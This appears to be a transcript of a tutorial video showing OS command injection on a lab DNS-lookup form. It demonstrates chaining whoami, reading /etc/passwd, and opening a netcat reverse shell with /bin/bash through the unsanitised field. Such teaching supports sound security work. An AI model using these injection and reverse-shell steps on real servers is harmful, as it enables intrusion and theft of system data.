In this video, we're going to be looking at OS command injections. And an OS command injection is a technique used by a web app interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands. And any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. The OS command injection is preventable when security is emphasized during the design and development of applications and when input is completely sanitized. So when this input is unsanitized and unfiltered, an attacker can put in commands into this and run it through the OS command box right here. In this example, we're going to be covering this vulnerability through manual input, but on the grand scheme of things, when systems are more intricate and more complex, all this will usually be done through automation. So a great way to show an OS command injection is through these kind of tools on the websites that are DNS lookup, IP lookups, and we're going to enter some kind of information here, press lookup, and all this is reflected back to the user, the IP address, and a little bit more information down here. And this will work for any website that you put in here. If I were to put in google.com, it'd send us information about Google. So in a secure website, usually these inputs are going to be sanitized in such a way that only one command can put in. You can't terminate another command. So let's take a look and see if we can terminate a command and enter another one. So let's just terminate it and then put in who am I. And right here, we see that we get www data, meaning that we are able to terminate the last command and enter another one, which means that we have a vulnerability here of that the website is not sanitizing this input. So let's see if we can run some tools through this. So let's put cat etc and then here we go. Right here, we're getting user information reflected right back to us from the server. So as I said before, this input is not being sanitized, meaning that we should be able to put in two different parameters. So if we put in the and run the who am I with the basic DNS lookup, we get the DNS information plus the other command I put in. So let's try to actually do something here and put a reverse shell through this input. And we're going to do this by using a netcat listener. So I'm going to put nc negative nbLP through port 1234. You should get a message saying that it's listening. So it's going to wait for me to put something into here. So we are going to go through here, put the terminator up, insert netcat, insert whatever our server we're running on. Sometimes it'd be an IP address, but right here it is localhost right here. So I'm going to put in localhost through port 1234 as I specified earlier. Now when I press lookup, you should be able to go back here and see that it's connected to it through 127.0.0.1. Now let's do something else here. Let's go run through the same process. So I have negative nbLP 1234. It's listening, but let's run a bin bash through this. So we're going to put in the same exact info. So we're going to put nc local host port 1234. Now we're going to put negative e bin bash. See, same exact information appears up here. So now all we have to do is run through here and put pwd. We get the website going through. Now we can put uname, and then we get the exact operating system that's being run through. Now we put uname -a, and then here we go. And we can now see that not only is it on Linux, but we're also running through bBox, which is exactly what's going on here. So that is exactly how we are able to run a reverse shell through an OS command injection and reveal some user information through this entry field right here.